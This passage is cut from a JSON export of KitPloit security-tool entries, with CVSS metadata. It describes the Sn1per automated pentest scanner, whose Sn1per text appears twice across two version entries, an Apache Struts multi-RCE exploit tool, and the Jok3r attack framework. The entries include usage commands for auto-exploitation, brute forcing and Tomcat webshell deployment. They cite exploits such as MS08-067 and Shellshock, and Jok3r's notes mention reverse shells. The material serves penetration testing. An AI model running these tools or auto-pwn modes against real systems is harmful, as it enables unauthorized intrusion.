targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-08T20:50:48", "description": "[![](https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s640/Sn1per_1_Sn1per.jpeg)](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[![](https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s640/Sn1per_8.png)](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[![](https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s640/Sn1per_9.png)](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[![](https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s640/Sn1per_10.png)](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[![](https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png)](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[![](https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s640/Sn1per_12.png)](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[![](https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s640/Sn1per_13.png)](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[![Demo](https://camo.githubusercontent.com/7ce47e489c830c05433d8352244c219380f67648/68747470733a2f2f61736369696e656d612e6f72672f612f4944636b453438424e5357513854563879456a4a6a6a4d4e6d2e706e67)](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:01:17", "description": " \n\n\n[![](https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s640/Apache-Struts-v3_1_screen.png)](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. \n \n**SHELL** \n**php** `finished` \n**jsp** `process` \n \n**CVE ADD** \n**CVE-2013-2251** `'action:', 'redirect:' and 'redirectAction'` \n**CVE-2017-5638** `Content-Type` \n**CVE-2018-11776** `'redirect:' and 'redirectAction'` \n \n \n\n\n**[Download Apache-Struts-v3](<https://github.com/s1kr10s/Apache-Struts-v3>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-26T21:14:00", "type": "kitploit", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-08T22:50:17", "description": "[![](https://2.bp.blogspot.com/-b-yEHDNsbTk/XEN8U7E8E2I/AAAAAAAAN8A/cGC9Z8NjoSUkGMyEFR9xJYU2XISstK8EgCLcBGAs/s640/jok3r_1_logo.png)](<https://2.bp.blogspot.com/-b-yEHDNsbTk/XEN8U7E8E2I/AAAAAAAAN8A/cGC9Z8NjoSUkGMyEFR9xJYU2XISstK8EgCLcBGAs/s1600/jok3r_1_logo.png>)\n\n \n_Jok3r_ is a Python3 CLI application which is aimed at **helping penetration testers for network infrastructure and web black-box security tests**. \nIts main goal is to **save time on everything that can be automated during network/web pentest in order to enjoy more time on more interesting and challenging stuff**. \nTo achieve that, it **combines open-source Hacking tools to run various security checks against all common network services.** \n** \n** [](<https://draft.blogger.com/null>) \n**Main features** \n**Toolbox management**: \n\n\n * Install automatically all the hacking tools used by _Jok3r_,\n * Keep the toolbox up-to-date,\n * Easily add new tools.\n**Attack automation**: \n\n\n * Target most common network services (including web),\n * Run security checks by chaining hacking tools, following standard process (Reconaissance, Vulnerability scanning, Exploitation, Account bruteforce, (Basic) Post-exploitation).\n * Let _Jok3r_ automatically choose the checks to run according to the context and knowledge about the target,\n**Mission management / Local database**: \n\n\n * Organize targets by missions in local database,\n * Fully manage missions and targets (hosts/services) via interactive shell (like msfconsole db),\n * Access results from security checks.\n_Jok3r_ has been built with the ambition to be easily and quickly customizable: Tools, security checks, supported network services... can be easily added/edited/removed by editing settings files with an easy-to-understand syntax. \n \n[](<https://draft.blogger.com/null>) \n**Installation** \n**The recommended way to use Jok3r is inside a Docker container so you will not have to worry about dependencies issues and installing the various hacking tools of the toolbox.** \n \nA Docker image is available on Docker Hub and automatically re-built at each update: <https://hub.docker.com/r/koutto/jok3r/>. It is initially based on official Kali Linux Docker image (kalilinux/kali-linux-docker). \n \n**Pull Jok3r Docker Image:** \n\n \n \n sudo docker pull koutto/jok3r\n\n**Run fresh Docker container:** \n\n \n \n sudo docker run -i -t --name jok3r-container -w /root/jok3r --net=host koutto/jok3r\n\n**Important: --net=host option is required to share host's interface. It is needed for reverse connections (e.g. Ping to container when testing for RCE, Get a reverse shell)** \nJok3r and its toolbox is ready-to-use ! \n\n\n * To re-run a stopped container:\n \n \n sudo docker start -i jok3r-container\n\n * To open multiple shells inside the container:\n \n \n sudo docker exec -it jok3r-container bash\n\nFor information about building your own Docker image or installing _Jok3r_ on your system without using Docker, refer to <https://jok3r.readthedocs.io/en/latest/installation.html> \n \n[](<https://draft.blogger.com/null>) \n**Quick usage examples** \n**Show all the tools in the toolbox** \n\n \n \n python3 jok3r.py toolbox --show-all\n\n**Install all the tools in the toolbox** \n\n \n \n python3 jok3r.py toolbox --install-all --fast\n\n**Update all the tools in the toolbox** \n\n \n \n python3 jok3r.py toolbox --update-all --fast\n\n**List supported services** \n\n \n \n python3 jok3r.py info --services\n\n**Show security checks for HTTP** \n\n \n \n python3 jok3r.py info --checks http\n\n**Create a new mission in local database** \n\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission -a MayhemProject\n \n [+] Mission \"MayhemProject\" successfully added\n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]>\n\n**Run security checks against an URL and add results to the mission** \n\n \n \n python3 jok3r.py attack -t https://www.example.com/webapp/ --add MayhemProject\n\n**Run security checks against a MSSQL service (without user-interaction) and add results to the mission** \n\n \n \n python3 jok3r.py attack -t 192.168.1.42:1433 -s mssql --add MayhemProject --fast\n\n**Import hosts/services from Nmap results into the mission scope** \n\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission MayhemProject\n \n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]> nmap results.xml\n\n**Run security checks against all services in the given mission and store results in the database** \n\n \n \n python3 jok3r.py attack -m MayhemProject --fast\n\n**Run security checks against only FTP services running on ports 21/tcp and 2121/tcp from the mission** \n\n \n \n python3 jok3r.py attack -m MayhemProject -f \"port=21,2121;service=ftp\" --fast\n\n**Run security checks against only FTP services running on ports 2121/tcp and all HTTP services on 192.168.1.42 from the mission** \n\n \n \n python3 jok3r.py attack -m MayhemProject -f \"port=2121;service=ftp\" -f \"ip=192.168.1.42;service=http\"\n\n[](<https://draft.blogger.com/null>) \n \n**Typical usage example** \nYou begin a pentest with several servers in the scope. Here is a typical example of usage of _JoK3r_: \n\n\n 1. You run _Nmap_ scan on the servers in the scope.\n 2. You create a new mission (let's say \"MayhemProject\") in the local database:\n \n \n python3 jok3r.py db\n \n jok3rdb[default]> mission -a MayhemProject\n \n [+] Mission \"MayhemProject\" successfully added\n [*] Selected mission is now MayhemProject\n \n jok3rdb[MayhemProject]>\n\n 3. You import your results from _Nmap_ scan in the database:\n \n \n jok3rdb[MayhemProject]> nmap results.xml\n\n 4. You can then have a quick overview of all services and hosts in the scope, add some comments, add some credentials if you already have some knowledge about the targets (grey box pentest), and so on\n \n \n jok3rdb[MayhemProject]> hosts\n \n [...]\n \n jok3rdb[MayhemProject]> services\n \n [...]\n\n 5. Now, you can run security checks against some targets in the scope. For example, if you want to run checks against all Java-RMI services in the scope, you can run the following command:\n \n \n python3 jok3r.py attack -m MayhemProject -f \"service=java-rmi\" --fast\n\n 6. You can view the results from the security checks either in live when the tools are executed or later from the database using the following command:\n \n \n jok3rdb[MayhemProject]> results\n\n[](<https://draft.blogger.com/null>) \n \n**Full Documentation** \nDocumentation is available at: <https://jok3r.readthedocs.io/> \n \n[](<https://draft.blogger.com/null>) \n**Supported Services & Security Checks ** \n**Lots of checks remain to be implemented and services must be added !! Work in progress ...** \n\n\n * [AJP (default 8009/tcp)](<https://github.com/koutto/jok3r#ajp-default-8009-tcp>)\n * [FTP (default 21/tcp)](<https://github.com/koutto/jok3r#ftp-default-21-tcp>)\n * [HTTP (default 80/tcp)](<https://github.com/koutto/jok3r#http-default-80-tcp>)\n * [Java-RMI (default 1099/tcp)](<https://github.com/koutto/jok3r#java-rmi-default-1099-tcp>)\n * [JDWP (default 9000/tcp)](<https://github.com/koutto/jok3r#jdwp-default-9000-tcp>)\n * [MSSQL (default 1433/tcp)](<https://github.com/koutto/jok3r#mssql-default-1433-tcp>)\n * [MySQL (default 3306/tcp)](<https://github.com/koutto/jok3r#mysql-default-3306-tcp>)\n * [Oracle (default 1521/tcp)](<https://github.com/koutto/jok3r#oracle-default-1521-tcp>)\n * [PostgreSQL (default 5432/tcp)](<https://github.com/koutto/jok3r#postgresql-default-5432-tcp>)\n * [RDP (default 3389/tcp)](<https://github.com/koutto/jok3r#rdp-default-3389-tcp>)\n * [SMB (default 445/tcp)](<https://github.com/koutto/jok3r#smb-default-445-tcp>)\n * [SMTP (default 25/tcp)](<https://github.com/koutto/jok3r#smtp-default-25-tcp>)\n * [SNMP (default 161/udp)](<https://github.com/koutto/jok3r#snmp-default-161-udp>)\n * [SSH (default 22/tcp)](<https://github.com/koutto/jok3r#ssh-default-22-tcp>)\n * [Telnet (default 21/tcp)](<https://github.com/koutto/jok3r#telnet-default-21-tcp>)\n * [VNC (default 5900/tcp)](<https://github.com/koutto/jok3r#vnc-default-5900-tcp>)\n\n \n\n\n[](<https://draft.blogger.com/null>) \n**AJP (default 8009/tcp)** \n\n \n \n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap AJP scripts | nmap |\n | tomcat-version | recon | Fingerprint Tomcat version through AJP | ajpy |\n | vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | default-creds-tomcat | bruteforce | Check [default credentials](<https://www.kitploit.com/search/label/Default%20Credentials>) for Tomcat Application Manager | ajpy |\n | deploy-webshell-tomcat | exploit | Deploy a webshell on Tomcat through AJP | ajpy |\n +------------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**FTP (default 21/tcp)** \n\n \n \n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | Name | Category | Description | Tool used |\n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n | nmap-recon | recon | Recon using Nmap FTP scripts | nmap |\n | nmap-vuln-lookup | vulnscan | Vulnerability lookup in Vulners.com (NSE scripts) and exploit-db.com (lots of false positive !) | vuln-databases |\n | ftpmap-scan | vulnscan | Identify FTP server soft/version and check for known vulns | ftpmap |\n | common-creds | bruteforce | Check common credentials on FTP server | patator |\n | bruteforce-creds | bruteforce | Bruteforce FTP accounts | patator |\n +------------------+------------+-------------------------------------------------------------------------------------------------+----------------+\n\n[](<https://draft.blogger.com/null>) \n**HTTP (default 80/tcp)** \n\n \n \n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n | Name | Category | Description | Tool used |\n +--------------------------------------+-------------+--------------------------------------------------------------------------------------------------+--------------------------------+\n | nmap-recon | recon | Recon using Nmap HTTP scripts | nmap |\n | load-balancing-detection | recon | HTTP load balancer detection | halberd |\n | waf-detection | recon | Identify and fingerprint WAF products protecting website | wafw00f |\n | tls-probing | recon | Identify the implementation in use by SSL/TLS servers (might allow server fingerprinting) | tls-prober |\n | fingerprinting-multi-whatweb | recon | Identify CMS, blogging platforms, JS libraries, Web servers | 